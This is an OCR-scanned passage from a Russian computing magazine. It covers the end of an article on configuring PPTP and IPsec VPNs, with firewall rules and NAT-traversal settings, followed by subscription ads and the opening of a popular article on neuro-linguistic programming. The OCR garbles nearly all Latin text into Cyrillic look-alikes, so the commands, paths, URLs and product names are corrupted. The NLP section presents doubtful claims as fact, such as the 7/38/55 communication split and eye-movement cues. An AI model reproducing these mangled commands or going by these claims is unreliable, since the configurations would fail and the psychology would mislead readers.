фик идет по защищенному ѴРП соединению. 
Зачастую это приводит к проблемам доступа 
ко внутренним ресурсам 1/Ш, а в некоторых 
случаях даже к отключению от ѴРЫ-сервера. 
Многие провайдеры вынуждены на своих ре- 
сурсах дополнительно выкладывать таблицу 
маршрутизации, чтобы пользователи могли 
подключиться к ѴРЫ серверу, одновременно 
работать в интернете и подключаться к ресур- 
сам «районной сети». 

Для подключения к РРТР серверу необходимо 
открыть 1723/ТСР порт и разрешить СКЕ 
протокол (номер 47) : 




НАСТРОЙКА СОЕДИНЕНИЯ 
ВТНЕ6КЕЕЫВ0ѴѴІР5ЕСѴРЫ СІЛЕЫТ 



ірЬаЫез -А ШРОТ -р Рср -з ІР_ѴРЫ_ 
сервера -сі локальный_ІР --зрогЕ 1723 
-3 АССЕРТ 

ірРаЫез -А ШРОТ -р дге -з ІР_ѴРОТ 
сервера -сі локальный_ІР -3 АССЕРТ 
ірРаЫез -А ООТРОТ -сі ІР_ѴР2\Г_сервера 
-з локальный_ІР -3 АССЕРТ 

Для РЕ правила также несложны, пример 
можно посмотреть в статье «Свет в конце 
криптотуннеля» (ддчдгѵѵ.хакер.ги/та^агіпе/ 

ха/109/160/1.а5р) . посвященной настрой- 
кам РРТР-сервера на базе ЕгееВЗБ/трсІ и 
ОрепВЗО/рортр. 

МАССОВЫЙ ПРОРЫВ РРТР ИЗ-ЗА ЫАТ Есть 
одна проблема, которая мешает использо- 
вать РРТР при подключении пользователей 
к серверу через ЫАТ. При таком соединении 
может быть активным только один ѴРЫ канал. 
В Ілпих это решается путем активации модуля 
ядра ір_паі:_ррі:р, просто запускаем: 



# /зЬіп/шосіргоЬе ір_паЕ_ррСр 

И все будет работать. Но в случае РЕ возни- 
кают сложности. Судя по всему, он не может 
корректно транслировать СКЕ-протокол, 
поэтому из локальной сети с частными (гло- 
бально немаршрутизируемыми) ІР-адресами 
невозможно организовать несколько РРТР 
подключений. Вариантов выхода из ситуации 
несколько, один из них — трансляция РРТР 
соединений с помощью ІРЕѴѴ. Активируем 
пакетный фильтр и указываем скрипт с пра- 
вилами: 

#ѵі/еІс/гс.соггі 

:Еігетлга11_епаЫе= " УЕЗ " 
:Еігетлга11_паЕ_епаЫе= "УЕЗ " 
Еігехѵа 11 _зсгірЕ= " /еЕс/ірШ. дге" 

Теперь разрешаем прохождение нужных 
пакетов: 
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УТИЛИТА КѴРЫС ОБЕСПЕЧИТ ПРОСТОЕ 
ПОДКЛЮЧЕНИЕ КЛЮБОМУТИПУ ѴРЫ 
В*ШХ 



Построение ѴР№ при 
динамическом ІР 

Часто помехой при создании VРN становится динамический ІР, выдава- 
емый провайдером. Проблему можно решить при помощи специализи- 
рованных сервисов динамического Б^ . На таких сервисах время уста- 
ревания ТТЬ указывается достаточно маленьким, поэтому другие Б^ 
сервера фактические его не кэшируют. Вместо ІР-адреса ѴРІѴ-сервера в 
настройках подключения можно указать закрепленное доменное имя. 
Многие хардварные роутеры имеют встроенную поддержку Бунатіс 
БМ8. Сегодня доступно несколько таких серверов — с1ѵп(іп5.ог#, йупйпз. 
сІк. по-ір.сот . Полный список смотри в БМ02 — сІтог.ог^/СотриІега/ 
Іпіег пеі /Рг оІосоІ8 ЛШ 8 ЛШ8 РгоѵісІег 8 /Бѵпатіс Б1Ѵ 8 



#ѵі/е*с/ірІѵѵ.дге 

# ! /Ъіп/зЬ. 

/зЬіп/ір^ -с[ /беѵ/зксііп «ЕІІЬЕЗ 
кІизЪ. 

пак 10 сопкід ік кхрО 

асісі 10 пак 10 дге к гот апу ко апу 

асісі 11 пак 10 кср кгот апу ко апу сізк-рогк рркр 

асісі 12 пак 10 кср кгот апу рркр ко апу 

асісі 11 пак 10 кср кгот апу ко апу сізкрогк рркр 

Не забываем сделать скрипт /еіс/ірЕ/ѵ.^ге исполняемым: 

# сЬтосі +х /екс/іркѵ/.дге 

В рулесетах РЕ запрещаем транслировать РРТР соединения 
и просто пропускаем их через фильтр: 

#ѵі/еІс/рксопІ 

по пак оп $ехкегпа1 ргоко дге аіі 
по пак оп $ехкегпа1 ргоко кср кгот апу \ 
ко апу рогк = рркр 

по пак оп $ехкегпа1 ргоко кср кгот апу \ 
рогк = рркр ко апу 

разз сдіііск оп $ехкегпа1 іпек ргоко кср кгот апу \ 
ко апу рогк 1723 

разз <диіск оп $ехкегпа1 іпек ргоко кср кгот апу \ 
рогк 1723 ко апу 

разз диіск оп $ехкегпа1 іпек ргоко дге \ 
к г от апу ко апу 

Но это не единственный вариант. Для трансляции РРТР 
пакетов можно задействовать специальные прокси, 
например, Ргіскіп РРТР Рюху ( гіскіп.зі.пеі) или ррірргоху 
(т^іх.сот/ррірргохѵ) . На момент написания этих строк в 
ОрепВЗБ 4.6-сиггепі добавили демон прррб, призванный 
разруливать множественные РРР сессии и помочь пользо- 
вателю в установлении соединений по Ь2ТР, РРТР и РРРоЕ. 

КАКОЙ ВАРИАНТ ВЫБРАТЬ ДЛЯ 5ІТЕ-Т0-5ІТЕ ѴРЫ? Нали- 
чие удаленных офисов или складских помещений у компа- 
нии сегодня не редкость. При такой «топологии» сотрудни- 
ки в процессе работы должны обращаться ко внутренним 
ресурсам, размещенным на центральных серверах. Задача 
админа в этом случае заключается в том, чтобы максималь- 
но упростить процесс, не поставив под удар защищенность 
всей сети. Альтернативы ѴРИ здесь нет, но выбор вариантов 
реализации достаточно широк: ОрепѴРІМ, Ь2ТР/ІР5ес, РРТР, 



ѴТііп ( ѵіип.зі.пеі) . 55НѴРЫ и некоторые другие. 

Напомним, что многие файерволы имеют все необходимое 
для организации такого канала: І5А Зегѵег («Надежный 
сторожевой сети», Х_05_2007), Кегіо ѴѴіпКоиіе Еігеѵѵаіі 
(«Марш-бросок в большую сеть», Х_09_2007), ІТС Зегѵег 
ГігаШссопігоІ.ги) и т.д. Если есть возможность выбора, 
одним из наиболее подходящих решений для организации 
зііе-Ю-зііе ѴРИ является ОрепѴРІМ. Причин несколько. 
Реализация имеется для большинства популярных опера- 
ционных систем: Ііпих, *В5Б, Зоіагіз, Мае 05 X, ѴѴіпсіоѵѵз от 
2000. Установка и настройка ОрепѴРН достаточно проста 
и под силу любому админу, представляющему процесс 
(подробнее о настройке ОрепѴРЫ читай в статьях «Доступ 
повышенной защищенности» и «Деликатное проникно- 
вение в частную сеть», опубликованных в Х_04_2007 и 
Х_02_2008 соответственно) . Для аутентификации и шиф- 
рования используются все доступные в 55Ь алгоритмы, 
поэтому можно запросто выбрать нужный, в соответствии 
с требованиями, предъявляемыми к защищенности (также 
стоит учесть пропускную способность канала и стоимость 
трафика) . Существенно, что поддерживается адаптивная 
компрессия потока, а работа через ЫАТ происходит без 
проблем. 

Еще одной альтернативой является использование протоко- 
ла ІРзес, большой плюс которого — встроенная поддержка 
всеми ОС, какѴѴіпсІот (отХР/2к35Р2 и выше), таки *піх. 
Соответствующие настройки для подключения имеются и 
в большинстве хардварных роутеров. Первоначальные на- 
стройки ІРзес в *піх можно назвать простыми. Такядра “В ЗБ 
и Ііпих уже поддерживают ІРзес. Если ядро Ііпих собиралось 
самостоятельно, то нужно проследить, чтобы были включены 
пункты «ІРзес: Ігапзрогі тосіе», «ІРзес: іиппеітосіе», «ІРзес: 
ВЕЕТ тосіе», «ІР: АН ігапзіогтаііоп» «ІР: Е5Р Ігапзіогтайоп» 
и «ІР: ІРСотр Ігапзіогтаііоп» и «РЕ_КЕУ зоскеіз», находя- 
щиеся в «№іѵ\югкіп§ зиррогі — №іѵѵогкіп§ орііопз» . Опцио- 
нально включаем поддержку протокола ІРСотр (ІР Рауіоаб 
Сотргеззіоп Ргоіосоі) . Также требуется активировать все 
пункты в Сгуріо§гарЫс АРІ. Если для ускорения обработки 
криптографических вычислений будет использоваться 
специальная плата (это позволит снизить требования к СРІІ), 
то не забудь и про пункты в «НагсКѵаге сгуріо Беѵісез». Для 
работы ІРзес использует следующие порты и протоколы: 

• 500/ШР — І5АКМР (Іпіегпеі ЗесигііуАззосіаііопКеу 
Мапа^етепі Ргоіосоі) ; 

• Е5Р (номер 50) — Епсарзиіаіесі Зесигііу Рауіоаб, инкапсу- 
лированные защищенные данные — обеспечение целост- 
ности и конфиденциальности передаваемых данных; 




> іпіо 

• Настройка РРТРѴРЫ 
в ѴѴіп2к8 описана 

в статье «Тун н ел ьн ы й 
синдром», опублико- 
ванной в мартовском 
номере][за 2009 год. 

• 0 настройке РРРоЕ 
и РРТР подключений 
в І_іпих читай в статье 
«Прорыв сквозь РРР» 
(Х_05_2008). 

• Отом, какоргани- 
зовать туннель при 
помощи ОрепЗЗН, 
рассказывается 

в июльском номере 
за 2008 год, в статье 
«Волшебные крипто- 
туннели». 
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УТИЛИТА ДИАГНОСТИКИ ІР5ЕС0Т 
МІСР050РТ 

• АН (номер 51) — АшйешШсагіоп Неабег, 
метки аутентификации — аутентификация 
отправителя информации и обеспечение 
целостности данных. 

Для установления ІРзес соединений в файер- 
воле следует открыть порт 500 и разрешить 
прохождение данных по протоколам АН/Е5Р. 
Приведем пример для ірііаЫез: 

# ірЬаЫез -А ШРОТ -р исір --б.рог'Ь 500 
-ш вОаОе --зОаОе ЫЕМ ~з АССЕРТ 

# ірОаЫез -А ООТРОТ -р исір --йрогС 500 
-ш зОаОе --зОаСе ЫЕМ ~3 АССЕРТ 

# ірСаЫез -А ШРОТ -р езр -3 АССЕРТ 

# ірСаЫез -А ООТРОТ -р езр -3 АССЕРТ 

# ірСаЫез -А ШРОТ -р аЬ -3 АССЕРТ 

# ірСаЫез -А ООТРОТ -р аЬ -з АССЕРТ 

Для управления туннелем понадобится набор 
утилит ІРзес-юоІз ( рзес-шоІз.зЕпеЕ) . 

Основной минус ІРзес состоит в том, что мар- 
шрутизаторы не умеют извлекать заголовки, 
поэтому работа через ЫАТ невозможна. 

Для устранения этой проблемы разработан 
протокол ПАТ-Тгаѵегзаі (ЫАТ-Т), обеспечи- 
вающий передачу Е5Р через ЕГОР (ЕЗРіпЕГОР) 
и использующий в своей работе порт 4500/ 
ЕГОР. При выборе аппаратного маршрутизато- 
ра следует обратить внимание на поддержку 
ПАТ-Тгаѵегзаі, это снимет ряд вопросов при 
настройке туннеля ІРзес. Если роутер уже 
есть, то возможно для него доступна прошив- 
ка, в которой данный протокол уже подде- 
рживается. Обновления можно поискать на 
сайте производителя или на специализиро- 
ванных ресурсах вроде БО-ѴѴКТ ( бб-ѵт.сот) . 
ЕгееѴѴКТ ( Ггееѵѵгіі.ог^) . ОрегіѴУКТ ( орепѵѵгі:. 
рг&), Міб^е ( тісі^е.ѵіаб.ог^.иа) и так далее. 
Ядро Ііпихуже поддерживает ЕЗРіпЕГОР, для его 
использования достаточно в настройках серве- 
ра разрешить ИАТ-Тгаѵегзаі в ірзес.сопі: 

паЕ_ 1 :гаѵегза 1 =уез 

Напомним, что кроме реализации ІРзес, 
встроенной в ядро Ьіпііх, есть и альтернати- 
вы: зігоп^Зѵѵші ( зігоп^зѵѵап.ог^) и Орепзѵѵап 

(ѵѵѵуѵѵ.орепзѵуап.ог^) . 

ѴѴіпсІоѵѵз обзавелся поддержкой ЫАТ-Т еще в 
версиях 2000/5РЗ и ХР/5Р2. Чтобы активиро- 
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СКРИНШОТОТ РЕДАКТОРА: 0РЕЫВ50/І5АКМР0 И5НКЕѴѴ50РТѴРЫ 
СЫЕІМТ В ДЕЙСТВИИ 



вать функцию ЫАТ-Т в ѴѴіпХР, следует в ветке 
реестра НКЕУ.ЕОСАЬ.МАСНШЕХЗузИетЧ 
СиггешСошгоІЗеіЛЗегѵісезМРзессоздать 
ПѴѴОКГО параметр АззитеЕГОРЕпсарзиІаіііоп 
СоШехЮпЗепсІІІііІе и установить его в одно 
из трех значений, определяющих порядок 
использования ІРзес: 

• 0 (по умолчанию) — подключение только с 
«белого» ІР; 

• 1 — подключение только из-за ЫАТ (ЫАТ-Т); 

• 2 — оба варианта подключения. 

Кстати, Місгозоіт выпустила инструмент 
Місгозоіт ІРзес Оіа^позіііс Тооі, который 
позволяет отслеживать состояние ІРзес-соеди- 
нения на локальной или удаленной машине 

и диагностировать проблему подключения. 
Утилита работает в ѴѴіпХР/2кЗ/Ѵізі:а/2к8. 
Чтобы решить проблемы РРТР и ІРзес, в новых 
версиях ѴѴіпсІоѵѵз (Ѵізіа 5Р1, ѴѴіп7 и ѴѴіп2к8) 
Місгозоіт предлагает использовать подклю- 
чения по протоколу 55ТР (Зесиге Зоскеі 
Типпе1іп§ Ргоіосоі, см. статью «Слоеный ѴР№> 
из августовского номера ] [ за 2008 год) . 

КАКИЕ КЛИЕНТЫ ПРЕДПОЧТИТЕЛЬНЕЕ ДЛЯ 
РАБОТЫ С ІР5ЕС?Все ОС ѴѴіпбоѵѵз, начиная 
с версии 2000, имеют все необходимое для 
подключения по ІРзес, однако встроенный 
клиент сложен в настройке даже для админис- 
траторов, не говоря уже о рядовых пользова- 
телях. Именно поэтому многие обращаются 



к программам от сторонних разработчиков. 
Большой популярностью за рубежом пользует- 
ся ТЪеСгеепВоѵѵѴРИ СНеш Ггііе^геепЪоѵѵ.сот/ 
ѵрп.ЬгтІ ), имеющий огромное количество 
настроек, в том числе аутентификацию при 
помощи смарт-карт. 

И-БіпкѴРИ СНеш обеспечивает удобное под- 
ключение по ІРзес (шифрование ЗИЕЗ/АЕ5 и 
поддержка ИАТ-Т) к ѴРИ шлюзам, образован- 
ным различными продуктами И-Ыпк. 
Линуксоиды, вероятно, предпочтут програм- 
му, имеющую графический интерфейс, такую 
какКѴрпс (работаете ІРзес, ІРзес/Ь2ТР, РРТР, 
ОрепѴРИ, Сізсо, Ѵшп и 55Н) . Также хочется 
отметить небольшой и бесплатный ЗЬгеѵѵ 
Зой ѴРИ СНеш (зНгеѵу.пеО . доступный как для 
ѴѴіпсІоѵѵз (от 2кдо 5е7еп), таки для ЕгееВЗИ, 
ИеіВЗИ, Ыпих. Он поддерживает подключе- 
ние к туннелям, образованным ІРзес-шоІз, 
ОрепЗѴѴАЫ, РгееЗѴѴАП, Зігоп^ЗѴѴАМ и ІзакшрсІ. 

ЗАКЛЮЧЕНИЕ Как ты мог убедиться, орга- 
низация ѴРЫ-сервиса требует тщательного 
планирования и предварительного ознаком- 
ления с особенностями каждого протокола. 
При настройке защищенных соединений на 
стороне клиента нюансов и неувязок также 
предостаточно. Мы надеемся, эта статья 
прольет свет на подводные камни техноло- 
гии виртуальных частных сетей и поможет 
тебе решить возникшие проблемы, ц-ц 
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ПОДПИШИТЕСЬ 

$Нор.дІс.ги 



Подписка - это: 

■ Выгода ■ Гарантия ■ Сервис 



о 

2 

< 

О 



СТРАНА 



ИГР 





бмес. 1300 руб. 
12 мес. 2300 руб. 





бмес. 912руб. бмес. 1080руб. 

12мес. 1656 руб. 12мес. 1960 руб. 





выходит 2 раза в месяц 

бмес. 2400руб. 
12мес. 4400 руб. 




оиохРЕпт 







бмес. 1200 руб. 
12мес. 2200 руб. 



ОраІРНоЮ МАСТЕРСКАЯ 



ХУ/ІИГ/ІН ПІШ 



о 

н 

0 

1 



б мес. 1 056 руб. 
1 2 мес. 1 920 руб. 



6 мес. 747 руб. 
12 мес. 1350 руб. 




б мес. 792 руб. 

1 2 мес. 1 440 руб. 



3 мес. 630 руб. 
бмес. 1140 руб. 






ХУ/ІИГ/ІН 




ШЙЖКС 




б мес. 890 руб. 
12 мес. 1630 руб. 





ё 

00 

< 




автомобилей 



шарсаш 




6 мес. 726 руб. 6 мес. 600 руб. 

12 мес. 1320 руб. 12 мес. 1080 руб. 




б мес. 990 руб. 

1 2 мес. 1 790 руб. 





зкіразз 




только на сайте 



4 мес. 628 руб. 

8 мес. 1136 руб. 



Моипіаіп 

Віке 




только на сайте 

4 мес. 464 руб. 
8 мес. 848 руб. 




только на сайте 

4 мес. 556 руб. 

8 мес. 1008 руб. 



ИаМаІ 




6 мес. 774 руб. 
12 мес. 1404 руб. 




Вышивают 
— крестиком 




6 мес. 564 руб. 
12 мес. 1105 руб. 




(дате)іапіі 

МЕДИА ДЛЯ ЭНТУЗИАСТОВ 



















ІЛЧІТ5 



Александр Лозовский ІогоѵгкуШдатеІапсі.ги 



Р5УСН0: 

КОДИНГ НА НЕЙРОЛИНГВЕ 

Нейролингвистическое программирование: 
внедряемся по-хакерски 

Мало найдется в психологии вещей более близких милому нашему 
сердцу хакингу, чем нейролингвистическое программирование. 
Нет, НЛП — это не наука о «соблазнение девушек Москва индиви- 
дуально дорого 1500 р». Это не наука о том, как превратить окружа- 
ющих людей в безвольных марионеток, вложив в их головы выгод- 
ные тебе линии поведения. А что же это такое? Читай ниже! 




С чего начинается НЛП 

По старой доброй традиции я хотел начать эту 
статью с определения. Казалось бы, что может 
быть логичнее? Ан нет. Если тебе доведется чи- 
тать научно-популярные книги по НЛП, первое, 
что тебя удивит — отсутствие определения как 
такового. Вернее, определение-то будет, но оно 
окажется настолько красиво размазанным по 
окружающему его тексту, что тебе наверняка 
покажется, что это и не определение вовсе, 
а всего лишь часть цветасто-рекламной оды 
нейролингвистическому программированию. 
Наверное, та к оно и есть, поскольку оп редел е- 
ниеу НЛП весьматенденциозно: 

НЛП — это наука о достижении поставленных 
целей самым прямым и эффективным образом. 
Вот, собственно, и все. Лучшего определения 
не будет, даже и не проси :). Этот подход от- 
ражает не столько «всесилие» НЛП, сколько 
мотивацию авторов данной методики. Дело в 
том, что отцы-основатели НЛП однажды за- 
дались следующими вопросами: 

• Почему одни люди успешны (профессио- 
нальны, гениальны, нужное подчеркнуть], а 
другие — нет? Можно ли выявить причины этой 
успешности и, используя формализованные 
способы, «транслировать» ее заинтересован- 
ным людям? 

• Почему некоторые люди продолжают годами 
совершать действия, которые не приводят ни к 
какому вразумительному результату? 

• Почемулюди идут разными путями кодномуи 
тому же результату? Одни идут криво и в обход, 
другие — прямо, четко и дерзко (очевидно, 
потому, что они настоящие хакеры — прим, 
автора]. 

И, должен тебе сказать, они не просто задались 
этими вопросами, они начали экспериментиро- 
вать. Что делают люди науки? Они берут крыс, 



сажаютих в лабиринты, бьют электрическим 
током и облучают гамма-лучами. Психологи- 
бихевиористы (поведенческие психологи] не 
стали стесняться и для получения ответа на 
один из вопросов провелитакиежеэкспери- 
менты, но над людьми. Построили два лабирин- 
та: один для крысы, другой — для человека. В 
центре лабиринта новоявленного Тесея ждал 
не Минотавр, но бонус: крыса получала бонус 
в виде куска сыра, человек— в виде длинного 
доллара. 

По результатам первого эксперимента 
первенство было за человеком, один и тотже 
лабиринтон проходил быстрее и эффективнее 
крысы. Но психологи — люди хитрые. После 
нескольких проходов они взяли и убрали сыр 
и доллары соответственно. После третьего 
неудачного прохода крысы отказывались идти 
в этотлабиринт (а чего там делать, сыра-то явно 
нет?]. А люди — нет. Они все ходили и ходили в 
денежный лабиринт в надежде, что $50 там все 
же появятся :). 

Экспериментальная иллюстрация кответу 
на третий вопрос, который про прямые пути и 
кривые дорожки, может быть взята прямиком 
из интернетов. Довольно давно мне попался 
на глаза код одного программера, который 
пересел на тогдашний Оеірбі 4 с Разсаі. Этот 
деятель не желал читать мануалы и почему-то 
ничего не знал про глобальные перемен- 
ные. Поняв, что переменные, объявленные в 
процедуре-обработчике нажатия на кнопку, 
не действуют в других обработчиках, кодер не 
стал напрягаться и... создал текстовый файл, в 
который он писал все значения всех пере- 
менных. Воттебе человеческий пример для 
животного эксперимента — вместо того, чтобы 
взять и дернуть за рычажок, который открыва- 
ет кормушку, некоторые люди предпочитают 



метаться по клетке до тех пор, пока не заденут 
рычажок, и из кормушки не появится пища. 
Эффект, как видишь, тоже есть, и он убеждает 
таких людей, что пища дается только тем, кто 
часами пляшет на потеху публике, а нетем, кто 
берет и открывает кормушку :). 

Сложившаяся на тот момент ситуация в пси- 
хотерапии — длительность лечения (бывало, 
многие месяцы контакта пациента с психо- 
терапевтом], слабая формализованность (не 
«сделай А, сделай В, сделай С — получишь 
результат», а непрогнозируемые, зависимые от 
самого терапевта действия, которые работают 
для него, но, возможно, не будут работать для 
его ученика] и непрогнозируемый результат, 
сподвигли отцов-основателей на собственные 
изыскания. На исторических моментах этих 
изысканий мы останавливаться не будем, а 
перейдем сразу к результатам. Ведь именно 
они нам и нужны. 

Словарь НЛП 

Для начала — немного теории. НЛП вводитне- 
сколько новыхтерминов и понятий, с которыми 
мы обязательно должны ознакомиться, иначе 
потом ничего не будет понятно. Скорее всего, 
большинство из нихты уже слышал. 

• Моделирование — это построение целевой 
«модели», например, того самого успешного 
человека. Происходитоно в несколько этапов: 

1. Собственно, моделирование стратегии. 
Моделируется нетолько внешнее поведение, 
ной внутренние мыслительные алгоритмы, не 
затрагивающие, впрочем, «психоаналитиче- 
ское подсознание». О них чуть ниже. 

2. Кодирование стратегии в виде конкретного 
алгоритма. Теперь понятно, зачем на самом деле 
в аббревиатуре НЛП нужна третья буква — «П»? 

3. Применение модели вычитания —уда- 
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Хитрый старец, смотрящий на нас с фотографии, как на жертву для своих 
экспериментов — один из отцов НЛП, Ричард Бэндлер. Кстати, на момент начала 
своих бесчеловечных исследований был студентом. 



ление из полученного алгоритма всего лишнего, иначе говоря, 
лишние «пляски по клетке» удаляем, конкретное «дерганье за 
рычаг» — оставляем. 

4. Встраивание стратегии — заливка полученной прошивки в пациента 
(точнее, обратившегося за психотерапевтической помощью). 

• Репрезентативная система — внутреннее отражение наших органов 
чувств. 

Соответственно им, существуют аудиальная, кинестетическая и визуаль- 
ная репрезентативные системы. Иначе говоря, зрение, слух, тактильное 



(и проприоцептивное — глубокая 
чувствительность) ощущение 
мы используем для прямого вос- 
приятия реальности, а репре- 
зентативные системы — для ее 
внутреннего отражения и вспоми- 
нания, реконструкции и «пере- 
проживания». Еслиты не очень 
понял, о чем я говорю, попробуй 
представить внешний вид своего 
пиджака с выпускного, ощущения 
отлежания на шезлонге во время 
прошлого отпуска, свои ощуще- 
ния на концерте любимой группы. 
Вот это и есть деятельность 
внутренних репрезентативных 
систем. 

Внутренние — «вспоминают» 
существующее или конструируют 
новое («как будет выглядеть этот 
халат, только с перламутровыми 
пуговицами»), внешние — отра- 
жаютвтвоем сознании действи- 
тельность (смотрят, слушают, 
щупают в реальном времени). 
Довольно широко известно, что 
по характеру мышления люди 
делятся на «аудиалов», «визуа- 
лов» и «кинестетиков» (есть еще 
«дигиталы», которые озабочены 
внутренним диалогом с самим 
собой, но представителей этой 
группы настолько мало, что мы 
о нихуважительно промолчим 

— прим.ред.) Действительно, 
большинство людей имеют 
лидирующую модальность: одни 
выделяюттонкие отличия в зву- 
ках, другие мыслятзрительными 
образами, третьи — предпочитают 
чувствовать, для них особенно 
важны ощущения. Разумеется, это 
не значит, что другие репрезента- 
тивные системы им недоступны: 
в кино мы все визуалы, на пляже 

- кинестетики, на концерте — соответственно, аудиалы. Кстати, а зачем 
мы все это сейчас изучаем? Что все это даст нам на практике? Перечис- 
лим по пунктам: 

- Понимание процессов, которые происходяту нас в голове. 

- Возможность прокачки навыка интимного общения — «подстройка» к 
модальности собеседника способствует возникновению раппорта. 

- Прокачка навыка профессионального общения — бесполезно объяс- 
нять визуалу какие-то рабочие моменты с позиции кинестетического 
мировосприятия и с использованием кинестетическихтерминов. Наука 

«перевода» между языками раз- 
ных модальностей воистину спо- 
собствует росту понимания между 
людьми. Как говорил краснозна- 
менный автор Спеца МасЮос: «для 
женщины-визуалки чистота — это 
когда все выглядит чистым, а для 
мужчины-кинестетика — это когда 
говно ктапкам не прилипает. Ну 
и как им понять другдруга без по- 
сторонней помощи?» 

- Глазные сигналы доступа. Из 



ПРО 
НО ПОНЕМУ 



«ЛИНГВИСТИЧЕСКОЕ» 
«НЕЙРО» 



«ПРОГРАММИРОВАНИЕ» 



ЯСНО, 



Нейро. Все милые слуху настоящего хакера слова вроде нейроинтерфейс, нейрохирургия, нейротоксин 
содержат приставку «нейро-», которая недвусмысленно намекает любому, даже самому непросвещен- 
ному, человеку, на отношение к нервной системе. Что, ты уже приготовился, что я сейчас расскажу 
тебе про нисходящие проекционные нервные волокна, нейротрансмиттеры, эндорфины и прочие так 
любимые мужскими журналами научные ништяки? Расслабься! Психологи — народ веселый, приставка 
«нейро-» в аббревиатуре НЛП существует по большей части для солидности. От неврологии и физиоло- 
гии в нем, фактически, только учение об анализаторах, сигнальных системах и условных рефлексах. 
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предыдущего пункта тебе стало ясно, что вы- 
явление предпочитаемой и/или используемой 
на данный момент репрезентативной системы 
очень важно для НЛ П-практика. И такие спо- 
собы были найдены. «Глазные сигналы» — это 
способ определения текущей репрезентатив- 
ной системы по движениям глаз. Зная их, ты, 
путем деликатного разглядывания направле- 
ния взгляда незнакомого тебе человека (раз- 
умеется, если он не разглядывает что-нибудь 
конкретное — чьи-нибудь глаза, прелести или 
экран компьютера), сможешь понять, в какой 
модальности он сейчас находится. 

1 . Визуальная — смотритлибо прямо перед со- 
бой слегка расфокусированным взглядом, либо 
смотрит вправо или влево вверх. Причем, если 
влево — обычно человекчто-то вспоминает 
(зрительно), если вправо — создает новые для 
себя зрительные образы. 

2. Аудиальная — взгляд по горизонтальной 
линии; влево — вспоминает, вправо — кон- 
струирует. 

3. Кинестетическая — взгляд вниз и вправо. 

• Предикаты —также способ выявления 
текущей репрезентативной системы, основан- 
ный на анализе речи (устной или письменной) 
исследуемого человека. Вполне логично, что 



мыслительная активность человека проявля- 
ется не только движениями глаз, но и более 
явно — словами ;). Товарищ, находящийся в 
определенной модальности, использует соот- 
ветствующие ей слова : 

• Визуальная — рассмотреть, увидеть, блестя- 
ще, отобразить. 

• Аудиальная — слушать, звучит, тон. 

• Кинестетическая — почувствовать, взвесить, 
легко/тяжело, затронуть, ухватить. 

От редактора. Здесь сам собой напрашивается 
пример. Представим себе центральный офис 
крупной компании, занимающейся изготовле- 
нием, продажей и монтажом пластиковых окон. 
Старший менеджер по продажам (стажеров и 
«обычных» менеджеровтакимтехникам, как 
правило, не обучают) определяеттип мышле- 
ния пришедшего потенциального покупателя 
(по движению глаз, жестикуляции, движению 
корпуса и т.п.), и, используя специальные слова 
и выражения, характерные для выявленной 
репрезентативной системы, ведете ним раз- 
говор на его языке. Например, клиент-визуал 
может услышать: «Обратите внимание, Ваша 
комната с этим окном будет вы глядеть та к» или 
«Посмотрите, какие у нас есть пластиковые 
окна». Кстати, если сделать предъяву, дескать, 



Бывший цэреушныйагент, 

Джон Гриндер, соавтор Ричарда 
Бэндлера, как бы говорит нам: «I 
ѵѵапіуои!». Книжку отэтих господ, 
«Ричард Бендлер, Джон Гриндер. 
Из лягушек— в принцы», 
рекомендуется прочесть в первую 
очередь 



не нужно на мне применять подобные приемы 
установления подсознательного доверия и 
развода на деньги, я знаю, зачем сюда при- 
шел, и что именно хочу купить, тебе, скорее 
всего, немного смутившись, ответят, что все 
это делается с благовидной целью «достичь 
эффективной коммуникации с клиентом» :). 

• Референтативная система — система, про- 
веряющая истинность поступившей информа- 
ции. Какэто ни парадоксально, поступившую 
по каналам органов чувств информацию мы 
проверяем также, каки отражаем — визуаль- 
но, аудиально, кинестетически. Выявляется 
конкретная участвующая система подобно 
репрезентативной — по глазным сигналам 
доступа, практическая ценностьже ее очень 
высока — от избавления отчувства ревности 
до обучения школьников правописанию :). 

Да, я тоже думаю, что научить безграмотных 
троллей писать «лучше» вместо «лудшэ» 
можнотолько хорошей поркой шпицрутенами, 
но у психологов на этот счет есть иное мнение. 
Более подробно о выявлении и использовании 
референтативной системы собеседника ты 
можешь прочесть в книге Ричарда Бендлера 

и Джона Гриндера «Из лягушек— в принцы 
(Вводный курс НЛП тренинга)». Эта книга, фак- 
тически, записи семинаров двух отцов НЛП, 
то есть информация из первых рук. Прочти ее 
обязательно, всего 430 Кб ріаіп ІехНа :). 

• Коммуникация — любой контакт, любое обще- 
ние с окружающими людьми. Наверняка ты 
слышал, что только 7% информации при этом 
передается словами. 38% приходится на тон 
голоса, 55% — на языкжестов. Так вот, это — 
чистая правда. 

• Раппорт — это синхронизация двух общаю- 
щихся людей. Очень просто — мобильные 
устройства синхронизируются между собой 
или, допустим, с «компьютером в гостиной» 

(эх, люблю я этотмайкрософтовскийтермин), 
а общающиеся люди — друге другом. Рап- 
порт— это не просто общение, это общение 
доверительное. Хитрые психологи, наблюдая 
за старыми друзьями и прочими интимно 
общающимися личностями, заметили, что два 
общающихся человека подстраиваются друг к 
другу голосом, позой, ритмом дыхания, движе- 
ниями корпуса, глаз, рук. Этом, почему тебе не 
нужно пытаться тупо копировать чужие позы, 

в надежде установить доверительный контакт 
без наличия доверия :), читай чуть ниже. 
•Якоря. В отличие отчугунных якорей, ккото- 
рым психологи прошлого привязывали своих 
недругов, якоря в НЛП имеют совершенно 
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Анналы Л ибрусека содержат тонны литературы по НЛП. Внимание! Прочти сначала рекомендованные 
][ первоисточники, поскольку в интернетах на тему НЛП содержится слишком много шарлатанства. 

И ни в коем случае не качай с ІоггепіБ.ги/пЛгаскег.огд локальную коллекцию Либрусека! 

Не поддерживай книжное пиратство! 




Проливаем свет на темные загадки НЛП 



другое, мирное, назначение. Это внешнийтриггер, способный вызывать 
воспоминание или даже целое душевное состояние, котороеты испыты- 
вал в прошлом. Так, запахдухов, которыми пользовалась одна из твоих 
подруг, внезапно навеянный в метро, вызываетутебя наплыв эротиче- 
ских чувств из прошлого, аудиотрек, который ты когда-то слушал во вре- 
мя сессии, способен привести тебя в состояние полной боеготовности, 
а увиденная картина с сельским пейзажем — ввергнуть в благостные 
переживания, связанные с твоими летними деревенскими вояжами. 
Специалисты по НЛП не надеются на такие «стихийно возникшие» яко- 
ря. Они берут да иное явление на вооружение, создают их сами, заяко- 
ривая в себе и в своих клиентах состояния, которые они затем вызывают 
по собственному желанию в зависимости от конкретной ситуации — для 
работы, публичного выступления или деловой встречи. 

Вот и весь наш сегодняшний словарь. Разумеется, он далеко неполон, 
